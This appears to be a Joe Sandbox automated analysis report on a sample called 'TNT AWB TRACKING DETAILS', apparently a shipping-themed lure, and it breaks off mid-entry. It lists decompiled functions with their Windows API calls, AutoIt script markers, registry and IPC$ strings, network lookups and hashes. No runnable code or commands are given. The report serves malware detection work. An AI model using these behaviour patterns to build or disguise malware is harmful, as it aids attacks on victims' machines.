Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 24d86f07fda8db883f9432039b88f54eda08d4599dd6d8a0b2512a6f836152de
Instruction ID: 648c29066b0e49fa5c4c9431cdd11ad55b4b1f0b3afc53ba4852fa8187ad009c
Opcode Fuzzy Hash: 24d86f07fda8db883f9432039b88f54eda08d4599dd6d8a0b2512a6f836152de
Instruction Fuzzy Hash: A58161716043419FCB24DFA4C984A6ABBE4EF89710F1488AEF889C72D1EB34D945CB52

Function 00B2C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B2C1FC
GetFocus.USER32 ref: 00B2C20C
GetDlgCtrlID.USER32(00000000), ref: 00B2C217
_memset.LIBCMT ref: 00B2C342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00B2C36D
GetMenuItemCount.USER32(?), ref: 00B2C38D
GetMenuItemID.USER32(?,00000000), ref: 00B2C3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00B2C3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00B2C41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B2C454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00B2C489

Strings

0, xrefs: 00B2C33A

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 45c869576d852247a3514acdd1e365b7d77e1f8565a2f62926510c5cf7a2d035
Instruction ID: 8f39dbd5b031e063d7b587b1ae9f22593c0a127cb4a287fed68027c4aebba98c
Opcode Fuzzy Hash: 45c869576d852247a3514acdd1e365b7d77e1f8565a2f62926510c5cf7a2d035
Instruction Fuzzy Hash: C1819D702083219FD720DF14E994A7FBBE8FB88714F104A6EF99997291CB70D905CB92

Function 00B1731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00B1738F
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00B1739B
CreateCompatibleDC.GDI32(?), ref: 00B173A7
SelectObject.GDI32(00000000,?), ref: 00B173B4
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00B17408
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00B17444
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00B17468
SelectObject.GDI32(00000006,?), ref: 00B17470
DeleteObject.GDI32(?), ref: 00B17479
DeleteDC.GDI32(00000006), ref: 00B17480
ReleaseDC.USER32(00000000,?), ref: 00B1748B

Strings

(, xrefs: 00B17410

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: b8b530bb93cbe795b6c234fc70504a3f534f232063e76ceeee1fc1c4df5dff46
Instruction ID: 047b1a696d5801402ced36740139af397ddc3fd042c9afea501ca9b6a5a48a84
Opcode Fuzzy Hash: b8b530bb93cbe795b6c234fc70504a3f534f232063e76ceeee1fc1c4df5dff46
Instruction Fuzzy Hash: FF513775944209EFCB25CFA8DC85EAEBBF9EF48310F14856DF95A97210CB31A9428B50

Function 00AA6A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00AC0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00AA6B0C,?,00008000), ref: 00AC0973

Part of subcall function 00AA4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA4743,?,?,00AA37AE,?), ref: 00AA4770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00AA6BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00AA6CFA

Part of subcall function 00AA586D: _wcscpy.LIBCMT ref: 00AA58A5

Part of subcall function 00AC363D: _iswctype.LIBCMT ref: 00AC3645

Strings

Bad directive syntax error, xrefs: 00ADE79D
Unterminated string, xrefs: 00ADE7E4
Error opening the file, xrefs: 00ADE43D, 00ADE4B8
EA06, xrefs: 00ADE452
AU3!, xrefs: 00AA6B61
>>>AUTOIT SCRIPT<<<, xrefs: 00ADE496
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00ADE421

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: f33530bb8a68da5f6c71d9e9c4ce42df72a668fe799e7e3353594b14062265a9
Instruction ID: c7a0398478755d5fda46b6b2adffa4466948ad25aa265abf9e76a7a710b1bc1d
Opcode Fuzzy Hash: f33530bb8a68da5f6c71d9e9c4ce42df72a668fe799e7e3353594b14062265a9
Instruction Fuzzy Hash: 18029B305083419FC724EF24C981AAFBBF5EF9A354F14482EF48A972A1DB30D949CB52

Function 00B02D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B02D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00B02DDD
GetMenuItemCount.USER32(00B65890), ref: 00B02E66
DeleteMenu.USER32(00B65890,00000005,00000000,000000F5,?,?), ref: 00B02EF6
DeleteMenu.USER32(00B65890,00000004,00000000), ref: 00B02EFE
DeleteMenu.USER32(00B65890,00000006,00000000), ref: 00B02F06
DeleteMenu.USER32(00B65890,00000003,00000000), ref: 00B02F0E
GetMenuItemCount.USER32(00B65890), ref: 00B02F16
SetMenuItemInfoW.USER32(00B65890,00000004,00000000,00000030), ref: 00B02F4C
GetCursorPos.USER32(?), ref: 00B02F56
SetForegroundWindow.USER32(00000000), ref: 00B02F5F
TrackPopupMenuEx.USER32(00B65890,00000000,?,00000000,00000000,00000000), ref: 00B02F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00B02F7E

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: fe683f53eec50a5963d7013161af8f9434849e8a0b826966879f83d52c4b100c
Instruction ID: 5c68435568f59f4d9d83abc49429dcee82447c3044bf9ec17419c526553fc627
Opcode Fuzzy Hash: fe683f53eec50a5963d7013161af8f9434849e8a0b826966879f83d52c4b100c
Instruction Fuzzy Hash: 8871D670640216BFEB218F54DC8DFAABFA4FF04754F140266F615A61E1CBB15C58D790

Function 00AF77DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA7BCC: _memmove.LIBCMT ref: 00AA7C06

_memset.LIBCMT ref: 00AF786B
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00AF78A0
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00AF78BC
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00AF78D8
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00AF7902
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00AF792A
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00AF7935
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00AF793A

Strings

\CLSID, xrefs: 00AF7822
SOFTWARE\Classes\, xrefs: 00AF780C
\IPC$, xrefs: 00AF7882

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: 1ddca1eddadddcc48a9a946315df73ce6cb79164a0aa859afe6aea7a853c4593
Instruction ID: 185bd215516217d03054e95b0df68cb6ae5a84be163cc54a6cc4b97bf55192c0
Opcode Fuzzy Hash: 1ddca1eddadddcc48a9a946315df73ce6cb79164a0aa859afe6aea7a853c4593
Instruction Fuzzy Hash: 4C41F772C1422DAACB21EFA4ED85DFEB7B8BF08750F404069F915A72A1DB705D05CB90

Function 00B20E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B1FDAD,?,?), ref: 00B20E31

Strings

HKEY_LOCAL_MACHINE, xrefs: 00B20E9A
HKU, xrefs: 00B20F43
HKCC, xrefs: 00B20EFF
HKEY_CURRENT_CONFIG, xrefs: 00B20EEE
HKLM, xrefs: 00B20EAF
HKEY_CURRENT_USER, xrefs: 00B20F10
HKEY_CLASSES_ROOT, xrefs: 00B20EC4
HKEY_USERS, xrefs: 00B20F32
HKCR, xrefs: 00B20ED9
HKCU, xrefs: 00B20F21

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: aff4d704120b952ba60b2d20771d380ff0121f5af4d18b101cb1b2f1001d5b98
Instruction ID: b6aa975ec87df07bbecb03b62dc5ad51c34ea99d807ec27093c29c4be9d2951d
Opcode Fuzzy Hash: aff4d704120b952ba60b2d20771d380ff0121f5af4d18b101cb1b2f1001d5b98
Instruction Fuzzy Hash: 1F412D3215425ACBDF20EF10EA95BEF37A4EF15340F5504A4FC691B292DB349D5ACB60

Function 00AFF7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00ADE2A0,00000010,?,Bad directive syntax error,00B2F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00AFF7C2
LoadStringW.USER32(00000000,?,00ADE2A0,00000010), ref: 00AFF7C9

Part of subcall function 00AA7DE1: _memmove.LIBCMT ref: 00AA7E22

_wprintf.LIBCMT ref: 00AFF7FC
__swprintf.LIBCMT ref: 00AFF81E
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00AFF88D

Strings

%s (%d) : ==> %s.: %s %s, xrefs: 00AFF7F7
Line %d:, xrefs: 00AFF818
., xrefs: 00AFF873
Error: , xrefs: 00AFF85B
Line %d (File "%s"):, xrefs: 00AFF833

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: b8dbe6d1f52a82c3568e1a70d9644947f7b62d17c2193a5ff037788827e10411
Instruction ID: 4d250b2a7bfbb76e7e88421621370479f3c8ed93f71690cd275bd031dfd68e1f
Opcode Fuzzy Hash: b8dbe6d1f52a82c3568e1a70d9644947f7b62d17c2193a5ff037788827e10411
Instruction Fuzzy Hash: 5A213C3290021EABCF12AFA0CD4AEFE7779BF18311F0444A9B515761A2EB719618DB51

Function 00B052C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00AA7BCC: _memmove.LIBCMT ref: 00AA7C06

Part of subcall function 00AA7924: _memmove.LIBCMT ref: 00AA79AD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00B05330
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00B05346
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B05357
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00B05369
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00B0537A

Strings

alias PlayMe, xrefs: 00B05309
play PlayMe wait, xrefs: 00B05364
open , xrefs: 00B052DF
close PlayMe, xrefs: 00B05341, 00B0536E
status PlayMe mode, xrefs: 00B0532B
play PlayMe, xrefs: 00B05375

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: c88f05d3d3ab578bcbb18d84915e899b84bb83a0313ed3cad9a526017d2a6396
Instruction ID: 1a01f25078774aff52f788a830fcba9f5c68048a9b156e7474b815ad5d858a8a
Opcode Fuzzy Hash: c88f05d3d3ab578bcbb18d84915e899b84bb83a0313ed3cad9a526017d2a6396
Instruction Fuzzy Hash: BD118231A5016D79D770B661CC4AEFFBFFCEB96B41F4004A9B802A70E1DEA01D09C9A0

Function 00B046B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00B046D2
gethostname.WSOCK32(?,00000100), ref: 00B046EC
gethostbyname.WSOCK32(?), ref: 00B046F9
_wcscpy.LIBCMT ref: 00B04721
_memmove.LIBCMT ref: 00B04734
inet_ntoa.WSOCK32(?), ref: 00B0473F
_strcat.LIBCMT ref: 00B0474D
_wcscpy.LIBCMT ref: 00B04764
WSACleanup.WSOCK32 ref: 00B04772
_wcscpy.LIBCMT ref: 00B04780

Strings

0.0.0.0, xrefs: 00B0471B

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 370c0d23a9ea95d201c42ba19b722095b492996f946f71ccda5ae892a477dc36
Instruction ID: 52d04d96522e02ae3f2b8b6190017e4dd059e8cd28028ed69f286ffb9becaf38
Opcode Fuzzy Hash: 370c0d23a9ea95d201c42ba19b722095b492996f946f71ccda5ae892a477dc36
Instruction Fuzzy Hash: 8211D271500115AFDB25AB70AD8AFEA7BFCEB02711F0441FAF545970A1EF708E828B50

Function 00B04F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00B04F7A

Part of subcall function 00AC049F: timeGetTime.WINMM(?,7694B400,00AB0E7B), ref: 00AC04A3

Sleep.KERNEL32(0000000A), ref: 00B04FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00B04FCA
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00B04FEC
SetActiveWindow.USER32 ref: 00B0500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00B05019
SendMessageW.USER32(00000010,00000000,00000000), ref: 00B05038
Sleep.KERNEL32(000000FA), ref: 00B05043
IsWindow.USER32 ref: 00B0504F
EndDialog.USER32(00000000), ref: 00B05060

Strings

BUTTON, xrefs: 00B04FDE

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: d543e6883ea6bebe9bb6c8913e7f2f2ef998939051fd9d8252520e44af604536
Instruction ID: 82a6e68a3b57627a907c7bca566b3dbebf90d5834747f4781c7ab75d7211ce14
Opcode Fuzzy Hash: d543e6883ea6bebe9bb6c8913e7f2f2ef998939051fd9d8252520e44af604536
Instruction Fuzzy Hash: 4F216F7020460AAFE7315F20ED99E3A7FA9EB65749F041078F506831F1DFA68D51CA61

Function 00B0D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA9837: __itow.LIBCMT ref: 00AA9862
Part of subcall function 00AA9837: __swprintf.LIBCMT ref: 00AA98AC

CoInitialize.OLE32(00000000), ref: 00B0D5EA
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00B0D67D
SHGetDesktopFolder.SHELL32(?), ref: 00B0D691
CoCreateInstance.OLE32(00B32D7C,00000000,00000001,00B58C1C,?), ref: 00B0D6DD
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00B0D74C
CoTaskMemFree.OLE32(?,?), ref: 00B0D7A4
_memset.LIBCMT ref: 00B0D7E1
SHBrowseForFolderW.SHELL32(?), ref: 00B0D81D
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00B0D840
CoTaskMemFree.OLE32(00000000), ref: 00B0D847
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00B0D87E
CoUninitialize.OLE32(00000001,00000000), ref: 00B0D880

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 2ee334f8796236c2aa4da2b9419e199bdbd7c0e961c4bb85bf8e211314ac869a
Instruction ID: ae0cbcf9aa51d81876999b558c4945563cd9783f260f3a32fcd7c9dd93f71f56
Opcode Fuzzy Hash: 2ee334f8796236c2aa4da2b9419e199bdbd7c0e961c4bb85bf8e211314ac869a
Instruction Fuzzy Hash: D6B1E975A00109AFDB14DFA4C984DAEBBF9EF49314F1484A9E909EB2A1DB31ED41CB50

Function 00AFC267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00AFC283
GetWindowRect.USER32(00000000,?), ref: 00AFC295
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00AFC2F3
GetDlgItem.USER32(?,00000002), ref: 00AFC2FE
GetWindowRect.USER32(00000000,?), ref: 00AFC310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00AFC364
GetDlgItem.USER32(?,000003E9), ref: 00AFC372
GetWindowRect.USER32(00000000,?), ref: 00AFC383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00AFC3C6
GetDlgItem.USER32(?,000003EA), ref: 00AFC3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00AFC3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 00AFC3FE

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: ad23c421565daadf9083f650000f9b47c583c5bcb18089496faf92c270356760
Instruction ID: b48bcc4a21110ecf70d949355888c68a1ebd1e0b0b5fa11f640721e816b0f069
Opcode Fuzzy Hash: ad23c421565daadf9083f650000f9b47c583c5bcb18089496faf92c270356760
Instruction Fuzzy Hash: A2510F71B00209ABDB18CFA9DD99ABEBBB6EB88711F14813DF615D7290DB709D41CB10

Function 00AA201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00AA2036,?,00000000,?,?,?,?,00AA16CB,00000000,?), ref: 00AA1B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00AA20D3
KillTimer.USER32(-00000001,?,?,?,?,00AA16CB,00000000,?,?,00AA1AE2,?,?), ref: 00AA216E
DestroyAcceleratorTable.USER32(00000000), ref: 00ADBCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AA16CB,00000000,?,?,00AA1AE2,?,?), ref: 00ADBCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AA16CB,00000000,?,?,00AA1AE2,?,?), ref: 00ADBCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AA16CB,00000000,?,?,00AA1AE2,?,?), ref: 00ADBD0A
DeleteObject.GDI32(00000000), ref: 00ADBD1C

Memory Dump Source

